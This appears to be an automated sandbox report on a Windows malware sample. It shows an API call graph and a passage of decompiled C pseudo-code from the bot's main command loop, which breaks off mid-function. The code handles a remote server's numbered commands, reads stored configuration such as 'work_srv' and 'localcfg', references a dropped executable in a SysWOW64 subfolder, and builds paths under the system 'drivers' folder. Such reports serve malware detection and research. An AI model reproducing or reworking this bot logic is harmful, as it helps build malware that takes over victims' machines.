7621->7622 7623 251b493 7622->7623 7624 251ef7c 3 API calls 7623->7624 7625 251b4bb 7624->7625 7759 251ad89 GetLocalTime SystemTimeToFileTime 7625->7759 7629 251b4cc 7630 251ef7c 3 API calls 7629->7630 7631 251b4dd 7630->7631 7632 251b211 7 API calls 7631->7632 7633 251b4ec 7632->7633 7634 251ef7c 3 API calls 7633->7634 7635 251b4fd 7634->7635 7636 251b211 7 API calls 7635->7636 7637 251b509 7636->7637 7638 251ef7c 3 API calls 7637->7638 7639 251b51a 7638->7639 7639->7539 7641 251a4c7 4 API calls 7640->7641 7642 251a52c 7641->7642 7643 251a542 GetTickCount 7642->7643 7644 251a539 GetTickCount 7642->7644 7643->7644 7646 251a56c 7644->7646 7646->7539 7648 251a4c7 4 API calls 7647->7648 7649 251a633 7648->7649 7649->7539 7651 251f04e 4 API calls 7650->7651 7653 251372a 7651->7653 7652 2513847 7652->7549 7652->7558 7653->7652 7654 25137b3 GetCurrentThreadId 7653->7654 7654->7653 7655 25137c8 GetCurrentThreadId 7654->7655 7655->7653 7657 251f04e 4 API calls 7656->7657 7659 251360c 7657->7659 7658 25136f1 7658->7549 7658->7557 7659->7658 7660 25136da GetCurrentThreadId 7659->7660 7660->7658 7661 25136e5 GetCurrentThreadId 7660->7661 7661->7658 7663 2514bff InterlockedExchange 7662->7663 7664 2514c08 7663->7664 7665 2514bec GetTickCount 7663->7665 7664->7560 7665->7664 7666 2514bf7 Sleep 7665->7666 7666->7663 7686 2514763 7667->7686 7669 251548a 7670 2515b58 7669->7670 7680 251558d lstrcpynA 7669->7680 7681 2515a9f lstrcpyA 7669->7681 7682 2515935 lstrcpynA 7669->7682 7683 2514ae6 8 API calls 7669->7683 7684 2515472 13 API calls 7669->7684 7685 25158e7 lstrcpyA 7669->7685 7690 2514ae6 7669->7690 7694 251ef7c lstrlenA lstrlenA lstrlenA 7669->7694 7696 2514699 7670->7696 7673 2514763 lstrlenA 7674 2515b6e 7673->7674 7717 2514f9f 7674->7717 7676 2515b79 7676->7539 7678 2515549 lstrlenA 7678->7669 7680->7669 7681->7669 7682->7669 7683->7669 7684->7669 7685->7669 7688 251477a 7686->7688 7687 2514859 7687->7669 7688->7687 7689 251480d lstrlenA 7688->7689 7689->7688 7691 2514af3 7690->7691 7693 2514b03 7690->7693 7692 251ebed 8 API calls 7691->7692 7692->7693 7693->7678 7695 251efb4 7694->7695 7695->7669 7722 25145b3 7696->7722 7699 25145b3 7 API calls 7700 25146c6 7699->7700 7701 25145b3 7 API calls 7700->7701 7702 25146d8 7701->7702 7703 25145b3 7 API calls 7702->7703 7704 25146ea 7703->7704 7705 25145b3 7 API calls 7704->7705 7706 25146ff 7705->7706 7707 25145b3 7 API calls 7706->7707 7708 2514711 7707->7708 7709 25145b3 7 API calls 7708->7709 7710 2514723 7709->7710 7711 251ef7c 3 API calls 7710->7711 7712 2514735 7711->7712 7713 251ef7c 3 API calls 7712->7713 7714 251474a 7713->7714 7715 251ef7c 3 API calls 7714->7715 7716 251475c 7715->7716 7716->7673 7718 2514fac 7717->7718 7721 2514fb0 7717->7721 7718->7676 7719 2514ffd 7719->7676 7720 2514fd5 IsBadCodePtr 7720->7721 7721->7719 7721->7720 7723 25145c1 7722->7723 7724 25145c8 7722->7724 7725 251ebcc 4 API calls 7723->7725 7726 251ebcc 4 API calls 7724->7726 7728 25145e1 7724->7728 7725->7724 7726->7728 7727 2514691 7727->7699 7728->7727 7729 251ef7c 3 API calls 7728->7729 7729->7728 7750 2512d21 GetModuleHandleA 7730->7750 7733 2512fcf GetProcessHeap HeapFree 7737 2512f44 7733->7737 7734 2512f85 7734->7733 7734->7734 7735 2512f4f 7736 2512f6b GetProcessHeap HeapFree 7735->7736 7736->7737 7737->7583 7737->7737 7739 251ab8c 7738->7739 7741 251abe9 7738->7741 7740 251aba8 lstrcpynA 7739->7740 7739->7741 7742 251abe1 InterlockedIncrement 7739->7742 7740->7739 7743 25138f0 7741->7743 7742->7739 7744 2513900 7743->7744 7746 2513980 7743->7746 7745 25130fa 4 API calls 7744->7745 7749 251390a 7745->7749 7746->7585 7747 251391b GetCurrentThreadId 7747->7749 7748 2513939 GetCurrentThreadId 7748->7749 7749->7746 7749->7747 7749->7748 7751 2512d46 LoadLibraryA 7750->7751 7752 2512d5b GetProcAddress 7750->7752 7751->7752 7754 2512d54 7751->7754 7753 2512d6b DnsQuery_A 7752->7753 7752->7754 7753->7754 7755 2512d7d 7753->7755 7754->7734 7754->7735 7754->7737 7755->7754 7756 2512d97 GetProcessHeap HeapAlloc 7755->7756 7756->7754 7758 2512dac 7756->7758 7757 2512db5 lstrcpynA 7757->7758 7758->7755 7758->7757 7760 251adbf 7759->7760 7784 251ad08 gethostname 7760->7784 7763 25130b5 2 API calls 7764 251add3 7763->7764 7765 251a7a3 inet_ntoa 7764->7765 7773 251ade4 7764->7773 7765->7773 7766 251ae85 wsprintfA 7767 251ef7c 3 API calls 7766->7767 7768 251aebb 7767->7768 7770 251ef7c 3 API calls 7768->7770 7769 251ae36 wsprintfA wsprintfA 7771 251ef7c 3 API calls 7769->7771 7772 251aed2 7770->7772 7771->7773 7774 251b211 7772->7774 7773->7766 7773->7769 7775 251b2bb FileTimeToLocalFileTime FileTimeToSystemTime 7774->7775 7776 251b2af GetLocalTime 7774->7776 7777 251b2d2 7775->7777 7776->7777 7778 251b2d9 SystemTimeToFileTime 7777->7778 7779 251b31c GetTimeZoneInformation 7777->7779 7780 251b2ec 7778->7780 7781 251b33a wsprintfA 7779->7781 7782 251b312 FileTimeToSystemTime 7780->7782 7781->7629 7782->7779 7785 251ad71 7784->7785 7789 251ad26 lstrlenA 7784->7789 7787 251ad85 7785->7787 7788 251ad79 lstrcpyA 7785->7788 7787->7763 7788->7787 7789->7785 7790 251ad68 lstrlenA 7789->7790 7790->7785 7792 2512d21 7 API calls 7791->7792 7793 2512f01 7792->7793 7794 2512f14 7793->7794 7795 2512f06 7793->7795 7797 2512684 2 API calls 7794->7797 7814 2512df2 GetModuleHandleA 7795->7814 7799 2512f1d 7797->7799 7799->7396 7800 2512f1f 7800->7396 7802 251f428 14 API calls 7801->7802 7803 251198a 7802->7803 7804 2511990 closesocket 7803->7804 7805 2511998 7803->7805 7804->7805 7805->7394 7808 2511c80 7806->7808 7807 2511d1c 7811 2511d47 wsprintfA 7807->7811 7808->7807 7809 2511cc2 wsprintfA 7808->7809 7812 2511d79 7808->7812 7810 2512684 2 API calls 7809->7810 7810->7808 7813 2512684 2 API calls 7811->7813 7812->7405 7813->7812 7815 2512e10 LoadLibraryA 7814->7815 7816 2512e0b 7814->7816 7817 2512e17 7815->7817 7816->7815 7816->7817 7818 2512ef1 7817->7818 7819 2512e28 GetProcAddress 7817->7819 7818->7794 7818->7800 7819->7818 7820 2512e3e GetProcessHeap HeapAlloc 7819->7820 7822 2512e62 7820->7822 7821 2512ede GetProcessHeap HeapFree 7821->7818 7822->7818 7822->7821 7823 2512e7f htons inet_addr 7822->7823 7824 2512ea5 gethostbyname 7822->7824 7826 2512ceb 7822->7826 7823->7822 7823->7824 7824->7822 7827 2512cf2 7826->7827 7829 2512d1c 7827->7829 7830 2512d0e Sleep 7827->7830 7831 2512a62 GetProcessHeap HeapAlloc 7827->7831 7829->7822 7830->7827 7830->7829 7832 2512a99 socket 7831->7832 7835 2512a92 7831->7835 7833 2512cd3 GetProcessHeap HeapFree 7832->7833 7834 2512ab4 7832->7834 7833->7835 7834->7833 7849 2512abd 7834->7849 7835->7827 7836 2512adb htons 7851 25126ff 7836->7851 7838 2512b04 select 7838->7849 7839 2512ca4 7840 2512cb3 GetProcessHeap HeapFree closesocket 7839->7840 7840->7835 7841 2512b3f recv 7841->7849 7842 2512b66 htons 7842->7839 7842->7849 7843 2512b87 htons 7843->7839 7843->7849 7846 2512bf3 GetProcessHeap HeapAlloc 7846->7849 7847 2512c17 htons 7866 2512871 7847->7866 7849->7836 7849->7838 7849->7839 7849->7840 7849->7841 7849->7842 7849->7843 7849->7846 7849->7847 7850 2512c4d GetProcessHeap HeapFree 7849->7850 7858 2512923 7849->7858 7870 2512904 7849->7870 7850->7849 7852 251271d 7851->7852 7853 2512717 7851->7853 7855 2512734 htons 7852->7855 7854 251ebcc 4 API calls 7853->7854 7854->7852 7856 25127cc htons htons sendto 7855->7856 7857 251278a 7855->7857 7856->7849 7857->7856 7859 2512944 7858->7859 7861 251293d 7858->7861 7874 2512816 htons 7859->7874 7861->7849 7862 2512871 htons 7863 2512950 7862->7863 7863->7861 7863->7862 7864 25129bd htons htons htons 7863->7864 7864->7861 7865 25129f6 GetProcessHeap HeapAlloc 7864->7865 7865->7861 7865->7863 7867 25128e3 7866->7867 7869 2512889 7866->7869 7867->7849 7868 25128c3 htons 7868->7867 7868->7869 7869->7867 7869->7868 7871 2512921 7870->7871 7872 2512908 7870->7872 7871->7849 7873 2512909 GetProcessHeap HeapFree 7872->7873 7873->7871 7873->7873 7875 251286b 7874->7875 7876 2512836 7874->7876 7875->7863 7876->7875 7877 251285c htons 7876->7877 7877->7875 7877->7876 7879 2516bbc 7878->7879 7880 2516bc0 7878->7880 7879->7427 7881 251ebcc 4 API calls 7880->7881 7892 2516bd4 7880->7892 7882 2516be4 7881->7882 7883 2516c07 CreateFileA 7882->7883 7884 2516bfc 7882->7884 7882->7892 7886 2516c34 WriteFile 7883->7886 7887 2516c2a 7883->7887 7885 251ec2e codecvt 4 API calls 7884->7885 7885->7892 7889 2516c49 CloseHandle DeleteFileA 7886->7889 7890 2516c5a CloseHandle 7886->7890 7888 251ec2e codecvt 4 API calls 7887->7888 7888->7892 7889->7887 7891 251ec2e codecvt 4 API calls 7890->7891 7891->7892 7892->7427

                                                                                                                                  Executed Functions

                                                                                                                                  Function 0251C913 Relevance: 113.4, APIs: 45, Strings: 19, Instructions: 1397filestringprocessCOMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 88%
                                                                                                                                  			E0251C913() {
				CHAR* _v8;
				CHAR* _v12;
				intOrPtr _v16;
				signed int _v17;
				signed int _v24;
				signed int _v35;
				CHAR* _v39;
				signed int _v52;
				long _v56;
				CHAR* _v60;
				CHAR* _v64;
				CHAR* _v68;
				signed int _v72;
				signed int _v76;
				char _v92;
				char _v96;
				long _v100;
				intOrPtr _v104;
				struct _PROCESS_INFORMATION _v120;
				char _v408;
				struct _PROCESS_INFORMATION _v424;
				char _v440;
				intOrPtr _v492;
				intOrPtr _v496;
				intOrPtr _v500;
				intOrPtr _v508;
				intOrPtr _v512;
				char _v640;
				intOrPtr _v688;
				intOrPtr _v720;
				intOrPtr _v728;
				intOrPtr _v732;
				CHAR* _v736;
				char _v740;
				struct _STARTUPINFOA _v808;
				struct _STARTUPINFOA _v876;
				char _v1176;
				void* __ebp;
				intOrPtr _t362;
				intOrPtr _t368;
				void* _t369;
				signed int _t388;
				signed int _t392;
				signed int _t395;
				signed int _t398;
				CHAR* _t403;
				signed int _t408;
				signed int _t409;
				signed int _t410;
				signed int _t413;
				signed int _t416;
				void* _t417;
				CHAR* _t418;
				signed int _t421;
				CHAR* _t428;
				signed int _t429;
				signed int _t434;
				signed int _t438;
				signed int _t439;
				signed int _t441;
				CHAR* _t444;
				signed int _t449;
				signed int _t453;
				signed int _t456;
				signed int _t459;
				signed int _t462;
				signed int _t463;
				signed int _t467;
				signed int _t472;
				signed int _t473;
				signed int _t476;
				signed int _t478;
				signed int _t479;
				CHAR* _t480;
				CHAR* _t483;
				signed int _t485;
				signed int _t488;
				signed int _t489;
				CHAR* _t492;
				long _t494;
				signed int _t499;
				signed int _t500;
				signed int _t501;
				signed char* _t502;
				intOrPtr* _t513;
				signed int _t514;
				signed int _t527;
				signed int _t541;
				signed int _t545;
				signed int _t552;
				intOrPtr* _t559;
				signed int _t560;
				signed int _t571;
				signed int _t575;
				signed int _t579;
				signed int _t583;
				signed int _t588;
				signed char _t590;
				signed int _t591;
				intOrPtr* _t595;
				signed int _t596;
				signed int _t599;
				void* _t602;
				intOrPtr* _t607;
				signed char* _t609;
				CHAR* _t613;
				intOrPtr _t615;
				signed int _t616;
				signed int _t617;
				signed int _t618;
				signed int _t621;
				signed int _t624;
				CHAR* _t630;
				void* _t632;
				signed int _t634;
				CHAR* _t635;
				CHAR* _t636;
				void* _t642;
				signed int _t644;
				void* _t651;
				int _t657;
				int _t673;
				signed int _t681;
				CHAR* _t686;
				intOrPtr _t688;
				void* _t695;
				CHAR* _t701;
				signed int _t705;
				signed int _t709;
				signed int _t711;
				signed int _t712;
				signed int _t723;
				signed char* _t726;
				char _t733;
				char _t734;
				char* _t736;
				void* _t738;
				signed int _t747;
				signed int _t748;
				signed int _t758;
				signed int _t760;
				void* _t763;
				signed int _t764;
				signed int _t765;
				void* _t766;
				void* _t768;
				void* _t769;
				long _t770;
				void* _t773;
				void* _t774;
				void* _t775;
				intOrPtr* _t776;
				intOrPtr* _t777;
				void* _t779;
				void* _t781;
				void* _t782;
				signed int _t789;
				signed int _t791;
				signed int _t793;
				signed int _t795;
				CHAR* _t796;
				signed char* _t797;
				signed int* _t798;
				signed int _t801;
				long _t803;
				signed int _t805;
				void* _t806;
				void* _t807;
				void* _t808;
				void* _t809;
				void* _t811;
				intOrPtr _t819;
				signed int _t820;
				intOrPtr _t821;
				signed int _t822;
				CHAR* _t823;

				_v64 = 0;
				_v68 = 0;
				_t819 =  *0x252366c; // 0x2522058
				if(_t819 == 0) {
					L2:
					E0251C517();
					L3:
					_t821 =  *0x252366c; // 0x2522058
					if(_t821 == 0) {
						L21:
						__eflags = 0;
						return 0;
					}
					_t822 =  *0x2523670; // 0x2
					if(_t822 == 0) {
						goto L21;
					}
					 *0x2522104 = E0251E819(1, "time_cfg", "wtm_c", 0x14);
					 *0x252210c = E0251E819(1, "time_cfg", "wtm_w", 0x28);
					_t362 = E0251E819(1, "time_cfg", "wtm_r", 0x28);
					_t808 = _t807 + 0x30;
					 *0x2522108 = _t362;
					_t823 =  *0x25236b0; // 0x4200000
					if(_t823 != 0) {
						L7:
						_t747 =  *0x2523674; // 0x0
						_t688 =  *0x252366c; // 0x2522058
						_v12 = 0;
						if( *((intOrPtr*)(_t747 * 0x45 + _t688 + 0x41)) != 0) {
							L11:
							_t748 = _t747 * 0x45;
							_t365 = _t748 + _t688;
							_t689 =  *((intOrPtr*)(_t748 + _t688 + 0x41));
							if( *((intOrPtr*)(_t748 + _t688 + 0x41)) == 0) {
								goto L21;
							}
							_t368 = E0251F428(E02512684(_t365 + 1), _t689);
							_v16 = _t368;
							_t829 = _t368;
							if(_t368 > 0) {
								_t369 = E0251F43E(_t368,  &_v640, 0xc8, 0); // executed
								_t809 = _t808 + 0x10;
								__eflags = _t369 - 0xc8;
								if(__eflags == 0) {
									E02518F53( &_v640, 0xc8);
									__eflags = _v500 - 0xff;
									_pop(_t695);
									if(__eflags > 0) {
										goto L15;
									}
									__eflags = _v512 - 7;
									if(__eflags > 0) {
										goto L15;
									}
									__eflags = _v508 - 7;
									if(__eflags > 0) {
										goto L15;
									}
									 *0x2523684 = 1;
									 *0x2523678 = 0;
									 *0x252367c = 0;
									E0251EA84(1, "localcfg", "ip", _v496);
									_v104 = E0251F04E(0);
									_v100 = _t748;
									E0251EA84(1, "localcfg", "srv_time", _v492);
									E0251EA84(1, "localcfg", "local_time", _v104);
									E02518FB6( &_v440,  &_v640);
									E02518FB6( &_v92,  &_v640);
									E0251EE2A(_t695,  &_v740, 0, 0x64);
									_v728 = 1;
									_v688 = 0x100007f;
									_v732 = 1;
									_v720 = 0x1f;
									_v736 = 0;
									_v39 = 0x37;
									_t388 = E0251C65C(_v16,  &_v640,  &_v92, 0x2522118, 0x64,  &_v52);
									_t811 = _t809 + 0x68;
									__eflags = _t388;
									if(_t388 > 0) {
										 *0x2522148 = 0;
										 *0x252215a = 0;
										while(1) {
											L24:
											_t757 = _v16;
											_t392 = E0251C75D(_v16,  &_v640,  &_v440,  *0x25236b0, 0x100000,  &_v52);
											_t811 = _t811 + 0x18;
											__eflags = _t392 - 0xfffffffe;
											if(_t392 == 0xfffffffe) {
												break;
											}
											__eflags = _t392;
											if(_t392 < 0) {
												continue;
											}
											_t395 = _v39;
											__eflags = _t395;
											if(_t395 == 0) {
												_t789 = 1;
												__eflags = 1;
												do {
													_t398 = 1 << _t789;
													__eflags = _v35 & _t398;
													if((_v35 & _t398) != 0) {
														__eflags =  *(_t789 + 0x252215c);
														if( *(_t789 + 0x252215c) == 0) {
															__eflags = _t789 - 3;
															if(_t789 != 3) {
																E0251F1ED(_t789,  &_v96, 0xa);
																E0251E654(E02518C51, 5,  &_v96);
																_t811 = _t811 + 0x18;
															}
														}
													}
													_t789 = _t789 + 1;
													__eflags = _t789 - 0x20;
												} while (_t789 < 0x20);
												continue;
											}
											__eflags = _t395 - 1;
											if(_t395 == 1) {
												_t403 =  *0x25236b0; // 0x4200000
												_t697 =  *_t403;
												_v24 = _t697;
												_t748 = _t403[4];
												_v76 = _t748;
												__eflags = _t697 & 0x00000018;
												if((_t697 & 0x00000018) == 0) {
													L177:
													__eflags = _v24 & 0x00000001;
													if((_v24 & 0x00000001) == 0) {
														L179:
														__eflags = _v24 & 0x00000004;
														if((_v24 & 0x00000004) == 0) {
															L182:
															__eflags = _v24 & 0x00000040;
															if((_v24 & 0x00000040) == 0) {
																L186:
																__eflags = _v24 & 0x00000080;
																if((_v24 & 0x00000080) == 0) {
																	L199:
																	__eflags = _v24 & 0x00000100;
																	if((_v24 & 0x00000100) == 0) {
																		L204:
																		__eflags = _v24 & 0x00000400;
																		if((_v24 & 0x00000400) == 0) {
																			L215:
																			_v8 = 0;
																			while(1) {
																				__eflags = _v64;
																				if(_v64 != 0) {
																					goto L228;
																				}
																				_t758 = _v8[0x2523300];
																				__eflags = _t758;
																				if(_t758 == 0) {
																					L225:
																					_v8 =  &(_v8[4]);
																					__eflags = _v8 - 0x80;
																					if(_v8 < 0x80) {
																						continue;
																					}
																					__eflags = _v64;
																					if(_v64 != 0) {
																						goto L228;
																					}
																					_v39 = 0;
																					_t408 = E0251C65C(_v16,  &_v640,  &_v92,  *0x25236b0, 0,  &_v52);
																					_t811 = _t811 + 0x18;
																					__eflags = _t408;
																					if(_t408 > 0) {
																						goto L24;
																					}
																					goto L228;
																				}
																				_t409 =  *(_t758 + 0x4c);
																				__eflags = _t409;
																				if(_t409 == 0) {
																					goto L225;
																				}
																				_t410 =  *_t409( &_v76,  &_v39,  *0x25236b0, 0x100000);
																				while(1) {
																					_t811 = _t811 + 0x10;
																					_v52 = _t410;
																					__eflags = _t410;
																					if(_t410 <= 0) {
																						break;
																					}
																					_t413 = E0251C65C(_v16,  &_v640,  &_v92,  *0x25236b0, _t410,  &_v52);
																					_t811 = _t811 + 0x18;
																					__eflags = _t413;
																					if(_t413 <= 0) {
																						_v64 = 1;
																						goto L225;
																					}
																					_t410 =  *(_t758 + 0x4c)( &_v76,  &_v39,  *0x25236b0, 0x100000);
																				}
																				goto L225;
																			}
																			break;
																		}
																		_t416 = E02517DD6(_t748);
																		__eflags = _t416;
																		if(_t416 != 0) {
																			goto L215;
																		}
																		_t417 = E0251F04E(0);
																		__eflags =  *0x25236ac - _t748; // 0x0
																		if(__eflags > 0) {
																			goto L215;
																		}
																		if(__eflags < 0) {
																			L209:
																			__eflags = "C:\\Windows\\SysWOW64\\ghrubsm\\pjzcupje.exe"; // 0x43
																			if(__eflags == 0) {
																				goto L215;
																			}
																			__eflags =  *0x25221a4; // 0x47a00
																			if(__eflags != 0) {
																				L214:
																				_t418 =  *0x25236b0; // 0x4200000
																				 *_t418 = 0;
																				_t733 =  *0x25221a4; // 0x47a00
																				_t418[4] = _t733;
																				_t734 =  *0x25222d4; // 0x92c105df
																				_t418[8] = _t734;
																				_v39 = 0x34;
																				_t421 = E0251C65C(_v16,  &_v640,  &_v92, _t418, 0xc,  &_v52);
																				_t811 = _t811 + 0x18;
																				__eflags = _t421;
																				if(_t421 <= 0) {
																					break;
																				}
																				goto L215;
																			}
																			_t791 = E0251675C("C:\\Windows\\SysWOW64\\ghrubsm\\pjzcupje.exe",  &_v72, 0);
																			_t811 = _t811 + 0xc;
																			__eflags = _t791;
																			if(_t791 != 0) {
																				 *0x25222d4 = E025124C2(_t791, _v72, 0);
																				 *0x25221a4 = _v72;
																				E0251EC2E(_t791);
																				_t811 = _t811 + 0x10;
																			}
																			__eflags =  *0x25221a4; // 0x47a00
																			if(__eflags == 0) {
																				goto L215;
																			} else {
																				goto L214;
																			}
																		}
																		__eflags =  *0x25236a8 - _t417; // 0x0
																		if(__eflags > 0) {
																			goto L215;
																		}
																		goto L209;
																	}
																	E0251E854(1, "localcfg", "except_info",  *0x25236b0, 0x100000, 0x2520264);
																	_t428 =  *0x25236b0; // 0x4200000
																	_t811 = _t811 + 0x18;
																	_t304 =  &(_t428[1]); // 0x4200001
																	_t736 = _t304;
																	do {
																		_t748 =  *_t428;
																		_t428 =  &(_t428[1]);
																		__eflags = _t748;
																	} while (_t748 != 0);
																	_t429 = _t428 - _t736;
																	_v12 = _t429;
																	__eflags = _t429;
																	if(_t429 <= 0) {
																		goto L204;
																	}
																	E0251E8A1(_t748, 1, "localcfg", "except_info", 0x2520264);
																	_v39 = 0xf;
																	_t434 = E0251C65C(_v16,  &_v640,  &_v92,  *0x25236b0, _v12,  &_v52);
																	_t811 = _t811 + 0x28;
																	__eflags = _t434;
																	if(_t434 <= 0) {
																		break;
																	}
																	goto L204;
																}
																_t760 = 0;
																__eflags =  *0x2522184; // 0x0
																if(__eflags != 0) {
																	E02516F5F( &_v408, 0x120);
																	_t449 =  *0x2522130; // 0x210
																	_push(0x2522184);
																	asm("sbb eax, eax");
																	_push( &_v408);
																	_t453 = ( ~(_t449 & 0x00000600) & 0x00000020) + 0x20;
																	__eflags = _t453;
																	_push(_t453);
																	_push( *0x2522159 & 0x000000ff);
																	_push( *0x2522134);
																	_push( *0x2522120);
																	_t456 = wsprintfA( *0x25236b0, E02512544(0x25222f8, 0x2520fa0, 0x27, 0xe4, 0xc8));
																	_t811 = _t811 + 0x34;
																	_t760 = _t456;
																}
																_t793 =  *0x25222d8; // 0x0
																__eflags = _t793;
																if(_t793 == 0) {
																	L193:
																	__eflags = _t760;
																	if(_t760 == 0) {
																		goto L199;
																	}
																	_v39 = 0xb;
																	_t438 = E0251C65C(_v16,  &_v640,  &_v92,  *0x25236b0, _t760,  &_v52);
																	_t811 = _t811 + 0x18;
																	__eflags = _t438;
																	if(_t438 <= 0) {
																		break;
																	}
																	__eflags =  *0x2522184; // 0x0
																	if(__eflags != 0) {
																		 *0x2522184 = 0;
																	}
																	_t439 =  *0x25222d8; // 0x0
																	__eflags = _t439;
																	if(_t439 != 0) {
																		E0251EC2E(_t439);
																		 *0x25222d8 = 0;
																	}
																	goto L199;
																} else {
																	_t441 = _t793;
																	_t293 = _t441 + 1; // 0x1
																	_t738 = _t293;
																	do {
																		_t748 =  *_t441;
																		_t441 = _t441 + 1;
																		__eflags = _t748;
																	} while (_t748 != 0);
																	_v60 = _t441 - _t738;
																	_t444 =  *0x25236b0; // 0x4200000
																	E0251EE08( &(_t444[_t760]), _t793, _t441 - _t738 + 1);
																	_t811 = _t811 + 0xc;
																	_t760 =  &(_v60[_t760]);
																	__eflags = _t760;
																	goto L193;
																}
															}
															while(1) {
																_t459 = E0251C06C( &_v24,  &_v39,  *0x25236b0, 0x100000);
																_t811 = _t811 + 0x10;
																__eflags = _t459;
																if(_t459 == 0) {
																	goto L186;
																}
																_t462 = E0251C65C(_t757,  &_v640,  &_v92,  *0x25236b0, _t459,  &_v52);
																_t811 = _t811 + 0x18;
																__eflags = _t462;
																if(_t462 <= 0) {
																	goto L228;
																}
															}
															goto L186;
														}
														_push(0x71c7);
														_push( *0x25236b0);
														_t463 = E0251E7B4();
														__eflags = _t463;
														if(_t463 <= 0) {
															goto L182;
														}
														_v39 = 2;
														_t467 = E0251C65C(_t757,  &_v640,  &_v92,  *0x25236b0, _t463 * 0x24,  &_v52);
														_t811 = _t811 + 0x18;
														__eflags = _t467;
														if(_t467 <= 0) {
															break;
														}
														goto L182;
													}
													E02513A00(_t697,  *0x25236b0);
													_v39 = 3;
													_t472 = E0251C65C(_t757,  &_v640,  &_v92,  *0x25236b0, 0x28,  &_v52);
													_t811 = _t811 + 0x1c;
													__eflags = _t472;
													if(_t472 <= 0) {
														break;
													}
													goto L179;
												}
												_push(_t697);
												_push(0x100000);
												_push(_t403);
												while(1) {
													_t473 = E02513C09(_t748);
													_t811 = _t811 + 0xc;
													__eflags = _t473;
													if(_t473 == 0) {
														goto L177;
													}
													_t697 =  &_v52;
													_v39 = 4;
													_t476 = E0251C65C(_t757,  &_v640,  &_v92,  *0x25236b0, _t473,  &_v52);
													_t811 = _t811 + 0x18;
													__eflags = _t476;
													if(_t476 <= 0) {
														goto L228;
													}
													_t478 = _v24 & 0x00000010;
													__eflags = _t478;
													_push(_t478);
													_push(0x100000);
													_push( *0x25236b0);
												}
												goto L177;
											}
											__eflags = _t395 - 2;
											if(_t395 == 2) {
												_t479 = E0251DF4C(_t748,  *0x25236b0);
												__eflags = _t479;
												if(_t479 != 0) {
													_t480 =  *0x25236b0; // 0x4200000
													E0251ED3B( &(_t480[4]), "work_srv", 8);
													_t483 =  *0x25236b0; // 0x4200000
													_t811 = _t811 + 0xc;
													__eflags =  *_t483 - 1;
													if( *_t483 == 1) {
														_t485 = E0251EED1( &(_t483[4]), "work_srv");
														__eflags = _t485;
														if(_t485 == 0) {
															 *0x2523680 = 0;
															 *0x2523674 = 0;
															 *0x2523678 = 0;
															 *0x252367c = 0;
															E0251C517();
															_v68 = 1;
														}
													}
												}
												continue;
											}
											__eflags = _t395 - 0xa;
											if(__eflags == 0) {
												E025131D0( *0x25236b0, _v52);
												L46:
												continue;
											}
											if(__eflags <= 0) {
												L156:
												_t763 = 0;
												__eflags = 0;
												do {
													_t249 = _t763 + 0x2523300; // 0x0
													_t488 =  *_t249;
													__eflags = _t488;
													if(_t488 == 0) {
														goto L165;
													}
													_t795 =  *(_t488 + 0x40);
													__eflags = _t795;
													if(_t795 == 0) {
														goto L165;
													}
													_t748 = 0;
													_t489 = _t488 + 0xc;
													__eflags = _t489;
													while(1) {
														_t705 =  *_t489;
														__eflags = _t705;
														if(_t705 == 0) {
															goto L165;
														}
														__eflags = _t705 - _v39;
														if(_t705 == _v39) {
															 *_t795(_v39,  *0x25236b0, _v52);
															_t811 = _t811 + 0xc;
															goto L165;
														}
														_t748 = _t748 + 1;
														_t489 = _t489 + 4;
														__eflags = _t748 - 0xa;
														if(_t748 < 0xa) {
															continue;
														}
														goto L165;
													}
													L165:
													_t763 = _t763 + 4;
													__eflags = _t763 - 0x80;
												} while (_t763 < 0x80);
												continue;
											}
											__eflags = _t395 - 0xc;
											if(_t395 <= 0xc) {
												_t796 =  *0x25236b0; // 0x4200000
												_t764 = 0;
												_v60 = 0;
												_v8 = _t796;
												__eflags =  *_t796;
												if( *_t796 <= 0) {
													L57:
													_t701 =  *0x25236b0; // 0x4200000
													_t93 = _t764 * 8; // 0x4200004
													_t797 =  &(_t701[_t93 + 4]);
													_t492 = _v52 + 4 + _t764 * 8;
													_t704 = _t797[0x124] + 0x128;
													_v8 = _t492;
													__eflags = _t797[0x124] + 0x128 - _t492;
													while(1) {
														_v12 = 0;
														if(__eflags > 0) {
															break;
														}
														__eflags = _v8;
														if(_v8 <= 0) {
															break;
														}
														__eflags =  *_t797 & 0x00000003;
														if(( *_t797 & 0x00000003) == 0) {
															L150:
															_t494 = _t797[0x124];
															_t704 = 0xfffffed8 - _t494;
															_v8 =  &(_v8[0xfffffffffffffed8]);
															_t797 =  &(_t797[_t494 + 0x128]);
															__eflags = _t797[0x124] + 0x128 - _v8;
															continue;
														} else {
															E0251EE2A(_t704,  &_v408, 0, 0x120);
															_t499 =  *_t797;
															_t811 = _t811 + 0xc;
															_t765 = 0;
															_t711 = 0x100;
															__eflags = _t499 & 0x00000f80;
															if((_t499 & 0x00000f80) == 0) {
																_t618 = _t499 | 0x00000100;
																__eflags = _t618;
																 *_t797 = _t618;
															}
															_t500 =  *_t797;
															__eflags = _t500 & 0x00000800;
															if((_t500 & 0x00000800) != 0) {
																_t616 = _t500 & 0xfffff7ff;
																 *_t797 = _t616;
																__eflags =  *0x252201e; // 0x0
																if(__eflags == 0) {
																	_t617 = _t616 | 0x00000200;
																	__eflags = _t617;
																} else {
																	_t617 = _t616 | _t711;
																}
																 *_t797 = _t617;
															}
															_t501 =  *_t797;
															__eflags = _t501;
															if(_t501 >= 0) {
																__eflags = _t711 & _t501;
																if((_t711 & _t501) == 0) {
																	__eflags = _t501 & 0x00000200;
																	if((_t501 & 0x00000200) == 0) {
																		__eflags = _t501 & 0x00000400;
																		if((_t501 & 0x00000400) == 0) {
																			goto L96;
																		}
																		GetSystemDirectoryA( &_v408, 0x100);
																		_t595 =  &_v408;
																		_t775 = _t595 + 1;
																		do {
																			_t723 =  *_t595;
																			_t595 = _t595 + 1;
																			__eflags = _t723;
																		} while (_t723 != 0);
																		_t596 = _t595 - _t775;
																		__eflags = _t596;
																		if(_t596 != 0) {
																			__eflags =  *((char*)(_t806 + _t596 - 0x195)) - 0x5c;
																			if( *((char*)(_t806 + _t596 - 0x195)) != 0x5c) {
																				 *((char*)(_t806 + _t596 - 0x194)) = 0x5c;
																			}
																		}
																		E0251EF1E( &_v408, "drivers\\");
																		_t776 =  &_v408;
																		_t141 = _t776 + 1; // 0x5d
																		_t711 = _t141;
																		do {
																			_t599 =  *_t776;
																			_t776 = _t776 + 1;
																			__eflags = _t599;
																		} while (_t599 != 0);
																		_t765 = _t776 - _t711;
																		__eflags = _t765;
																		goto L96;
																	}
